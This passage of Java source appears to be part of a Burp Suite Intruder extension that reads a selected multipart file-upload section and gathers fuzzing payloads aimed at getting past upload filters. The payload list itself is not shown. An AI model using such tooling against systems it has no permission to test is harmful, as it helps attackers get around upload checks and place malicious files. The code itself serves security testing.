 62 |         callbacks.printOutput("是否为完整区域: " + isFullSection);
 63 |         
 64 |         if (isFullSection) {
 65 |             Matcher filenameMatcher = Pattern.compile("filename=\"([^\"]*)\"").matcher(selectedArea);
 66 |             Matcher namematcher = Pattern.compile("name=\"([^\"]*)\"").matcher(selectedArea);
 67 |             Matcher contentTypeMatcher = Pattern.compile("Content-Type:\\s*([^\\r\\n]*)").matcher(selectedArea);
 68 | 
 69 | 
 70 |             if (filenameMatcher.find() && filenameMatcher.group(1).contains(".")) {
 71 |                 String originalFilename = filenameMatcher.group(1);
 72 |                 String originalExt = originalFilename.substring(originalFilename.lastIndexOf('.') + 1);
 73 |                 String name = namematcher.find() ? namematcher.group(1) : "file";
 74 |                 String contentType =  contentTypeMatcher.find() ? contentTypeMatcher.group(1).trim() : "image/jpeg";
 75 | 
 76 |                 List<String> sectionPayloads = PayloadGenerator.getFuzzPayloadsForFullSection(selectedArea);
 77 |                 callbacks.printOutput("区域payload生成完成，数量: " + sectionPayloads.size()); // 添加调试信息
 78 |                 
 79 |                 String template = "Content-Disposition: form-data; name=\""+name+"\"; filename=\"test." + originalExt +
 80 |                         "\"\r\nContent-Type:"+contentType;
 81 |                 List<String> singleElementPayloads = PayloadGenerator.getAttackPayloads(template);
 82 | 
 83 |                 List<String> convertedPayloads = new ArrayList<>(singleElementPayloads);
 84 | 
 85 |                 Set<String> uniquePayloads = new HashSet<>();
 86 |                 uniquePayloads.addAll(sectionPayloads);
 87 |                 uniquePayloads.addAll(convertedPayloads);
 88 |                 attackPayloads = new ArrayList<>(uniquePayloads);
 89 |             } else {
 90 |                 attackPayloads = PayloadGenerator.getFuzzPayloadsForFullSection(selectedArea);
 91 |             }
 92 |         } else {
 93 |             attackPayloads = PayloadGenerator.getAttackPayloads(selectedArea);
 94 |         }
 95 | 
 96 |         // 限制 payload 数量防止内存溢出
 97 |         if (attackPayloads.size() > 1000) {
 98 |             attackPayloads = attackPayloads.subList(0, 1000);
 99 |         }
100 | 
101 |         attack.getHttpService().getHost();
102 |     }
103 | 
104 |     private List<String> removeDuplicates(List<String> list) {
105 |         Set<String> set = new HashSet<>(list);
106 |         return new ArrayList<>(set);
107 |     }
108 | 
109 |     @Override
110 |     public void reset() {
111 |         payloadIndex = 0;
112 |     }
113 | }


--------------------------------------------------------------------------------